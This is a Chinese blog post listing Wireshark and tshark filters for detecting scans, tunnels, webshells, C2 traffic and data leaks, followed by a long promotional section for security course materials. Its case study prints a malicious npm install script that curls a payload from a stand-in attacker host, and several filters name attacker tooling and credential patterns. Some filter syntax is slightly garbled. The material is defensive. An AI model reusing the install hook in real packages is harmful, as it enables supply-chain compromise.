20个Wireshark在网络安全分析中的实战技巧

一、基础配置篇

    1. 安全捕获环境搭建
# 创建隔离分析环境
sudo ip linkset eth0 promisc on
sudo tcpdump -i eth0 -s 0 -w /mnt/isolated/evidence.pcap
    1. 预置过滤模板
# 高危协议快速过滤
tcp.port in {135,139,445,3389} || udp.port in {53,123,161,500,4500}
    1. 关键字段标记
  • • 右键点击IP → Apply as Column
  • • 将TTL异常值设为显眼红色(TTL<64 or TTL>128)

二、攻击检测篇

    1. 扫描行为识别
# SYN扫描检测
tcp.flags.syn==1and tcp.flags.ack==0and tcp.window_size <=1024
    1. 暴力破解捕获
# SSH爆破特征
tcp.port==22and (tcp.flags.reset==1or tcp.analysis.retransmission)
    1. DNS隐蔽隧道
# 检测长域名请求
dns and frame.len > 256 && !contains(dns.qry.name,".google.")
    1. WebShell通信特征
http.content_type=="application/octet-stream" 
&& http.request.method=="POST"
&& frame.len >1024
    1. 勒索软件通信
tcp contains "GET /decrypt_instructions"
|| tls.handshake.extensions_server_name=="lockbit"

三、数据泄露监控

    1. 信用卡外泄检测
frame matches "\\b[3456]\\d{3}[ -]?\\d{4}[ -]?\\d{4}[ -]?\\d{4}\\b"
    1. 数据库拖库行为
mysql.query contains "SELECT" 
&& frame.len >1500
&& tcp.srcport==3306
    1. 云凭据泄露
http.request.uri contains "?AccessKeyId="
|| tls contains "AKIA"

四、高级威胁狩猎

    1. Cobalt Strike检测
# Beacon心跳包特征
tcp.payload matches "\\x00\\x00\\x00..\\xff\\xff\\xff"
&& tcp.len between 20and50
    1. Metasploit载荷识别
http contains "Meterpreter"
|| tcp contains "core_loadlib"
    1. 域渗透横向移动
smb || kerberos 
&& (ip.src==<域控IP>or ip.dst==<域控IP>)
    1. 内存攻击特征
tcp contains "\\x90\\x90\\x90"  # NOP sled检测
|| http contains ".dll"

五、加密流量分析

    1. TLS指纹识别
# 检测恶意JA3指纹
tls.handshake.ja3 contains "6734f37431670b3ab4292b8f60f29984"
    1. 证书异常检测
tls.handshake.certificate 
&& (x509sat.uTF8String == "Phishing Ltd" 
|| x509ce.dNSName == "freevpn.malicious.ru")

六、应急响应实战

    1. 攻击时间轴重建
tshark -r attack.pcap -T fields -e frame.time 
-e ip.src -e ip.dst -e tcp.port > timeline.csv
    1. 恶意文件提取
# 从HTTP流量中提取PE文件
tshark -r infection.pcap --export-object http,./malware
    1. 攻击者画像生成
# 提取攻击链关键信息
echo"=== C2服务器 ==="
tshark -r c2.pcap -Y "dns" -T fields -e dns.qry.name

echo"=== 用户代理 ==="
tshark -r c2.pcap -Y "http.user_agent" -T fields -e http.user_agent

七、法律合规要点

  • 取证规范:全程使用editcap保留原始时间戳
  • 哈希校验sha256sum evidence.pcap > chain_of_custody.txt
  • 隐私过滤:使用tcprewrite匿名化用户数据
tcprewrite --infile=raw.pcap --outfile=anon.pcap 
--dstipmap=192.168.1.0/24:10.0.0.0/24

八、真实攻击案例分析

案例1:供应链攻击溯源

    1. 捕获异常NPM包更新请求:
HTTP/1.1200 OK
Content-Type: application/json
{"version":"1.2.3","scripts":{"install":"curl http://mal-registry.com/payload.sh"}}
    1. 追踪关联IP:
tshark -r breach.pcap -Y "ip.addr==203.0.113.5" -z conv,ip

案例2:金融木马通信解密

    1. 提取恶意DLL中的RC4密钥
    1. Wireshark配置协议解密:
Protocols -> TLS -> (Pre)-Master-Secret log: /path/to/keys.log

九、高阶技巧拓展

  • 流量基线比对:使用capinfos建立正常流量指纹
capinfos -Tm -r baseline.pcap > baseline_profile.txt
  • AI辅助分析:集成Suricata告警日志
tshark -r traffic.pcap -Y "frame.comment contains 'ET PHISHING'"
  • 工控协议解析:自定义Modbus/TCP解析器
dissector_add_uint("tcp.port", 502, modbus_handle);

十、重要提醒

    1. 三层验证原则:流量特征+行为模式+外部情报
    1. 避免分析陷阱
    • • 勿将CDN IP误判为攻击源
    • • 识别合法的云服务通信(如AWS metadata)
    1. 持续更新知识库
    • • 每日更新GeoIP2数据库
    • • 订阅威胁情报Feeds

某次金融攻防演练中,攻击者使用域前置技术隐藏C2通信。防守方通过Wireshark发现异常:

HTTP/2200 OK  
:authority: legit-cdn.com
x-amz-cf-pop: SIN2-C1 # 新加坡节点

但TLS证书却显示:

x509ce.dNSName: c2-malicious.tk

正是这0.5秒的协议解析差异,阻止了千万级资金损失


附:分析师必备过滤库

# 内网横向移动检测
smb || ldap || winrm || wmi

# 加密挖矿特征
tcp contains "stratum+tcp"
|| http contains "xmr"

# 钓鱼页面识别
http contains "login"
&& http contains "password"
&& !(http.host contains "corp")

当0day攻击发生时,EDR可能沉默、防火墙可能失效,但流过网卡的数据包永远是最诚实的证人。掌握这20项核心技能,意味着你拥有了穿透网络迷雾的终极武器。

黑客/网络安全学习路线

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!

一、2025最新网络安全学习路线

一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

我们把学习路线分成L1到L4四个阶段,一步步带你从入门到进阶,从理论到实战。


在这里插入图片描述

L1级别:网络安全的基础入门

L1阶段:我们会去了解计算机网络的基础知识,以及网络安全在行业的应用和分析;学习理解安全基础的核心原理,关键技术,以及PHP编程基础;通过证书考试,可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。


在这里插入图片描述

L2级别:网络安全的技术进阶

L2阶段我们会去学习渗透测试:包括情报收集、弱口令与口令爆破以及各大类型漏洞,还有漏洞挖掘和安全检查项目,可参加CISP-PTE证书考试。


在这里插入图片描述

L3级别:网络安全的高阶提升

L3阶段:我们会去学习反序列漏洞、RCE漏洞,也会学习到内网渗透实战、靶场实战和技术提取技术,系统学习Python编程和实战。参加CISP-PTE考试。


在这里插入图片描述

L4级别:网络安全的项目实战

L4阶段:我们会更加深入进行实战训练,包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题


在这里插入图片描述

整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握;而L3 L4更多的是通过项目实战来掌握核心技术,针对以上网安的学习路线我们也整理了对应的学习视频教程,和配套的学习资料。

二、技术文档和经典PDF书籍

书籍和学习文档资料是学习网络安全过程中必不可少的,我自己整理技术文档,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,(书籍含电子版PDF)


在这里插入图片描述

三、网络安全视频教程

对于很多自学或者没有基础的同学来说,书籍这些纯文字类的学习教材会觉得比较晦涩难以理解,因此,我们提供了丰富的网安视频教程,以动态、形象的方式展示技术概念,帮助你更快、更轻松地掌握核心知识

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。


在这里插入图片描述

四、网络安全护网行动/CTF比赛

学以致用 ,当你的理论知识积累到一定程度,就需要通过项目实战,在实际操作中检验和巩固你所学到的知识,同时为你找工作和职业发展打下坚实的基础。


在这里插入图片描述

五、网络安全工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

面试不仅是技术的较量,更需要充分的准备。

在你已经掌握了技术之后,就需要开始准备面试,我们将提供精心整理的网安面试题库,涵盖当前面试中可能遇到的各种技术问题,让你在面试中游刃有余。

如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…


在这里插入图片描述


img

**读者福利 |** CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

Logo

北京人形旗下天工造物具身智能开源社区,聚焦具身天工与慧思开物两大平台

更多推荐